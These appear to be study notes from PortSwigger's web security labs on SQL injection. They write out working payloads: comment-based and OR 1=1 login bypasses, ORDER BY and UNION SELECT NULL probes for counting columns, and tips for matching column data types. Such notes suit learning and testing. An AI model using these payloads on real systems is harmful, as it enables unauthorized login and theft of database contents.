PSG SQL

Basic SQL Login Auth bypass

Note: inside Burp Repeater, remember to press Ctrl+U to URL-encode the payload, so that

' order by 1 --

will become

'+order+by+1+--

Vulnerable query

`SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'`

Crafting

SELECT * FROM users WHERE username = 'administrator' --' AND password = 'bluecheese'

SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'bluecheese'

Exploit Delivery

administrator' --
' OR 1=1 --

Type of SQL injections

  • In-band SQLi: the query result (or error) comes back in the application's own response, aka classic SQLi

  • Inferential SQLi: nothing is returned directly; you infer the result from the application's behaviour (true/false conditions, time delays), aka blind SQLi

  • Out-of-band SQLi: the database is made to contact a server you control, and that server relays the data back to you

UNION attack to retrieve data from other tables

Vulnerable query

select * from categoryTable where category='Corporate Gifts'

Determine number of columns

' order by 1 -- 
' order by 2 --

Combine order by with select query

select * from categoryTable where category='' order by 1 -- anything after the comment marker is ignored

UNION SELECT can be used to double check the number of columns

' UNION SELECT NULL-- 
' UNION SELECT NULL,NULL-- 
' UNION SELECT NULL,NULL,NULL--

Ensure the same data type

Each column in the UNION SELECT must be compatible with the corresponding column of the original query. Probe each column to find which type it accepts, e.g.:

'a' , 'a'
123 , 'a123'

  • characters?

  • alphanumeric?

  • numbers?
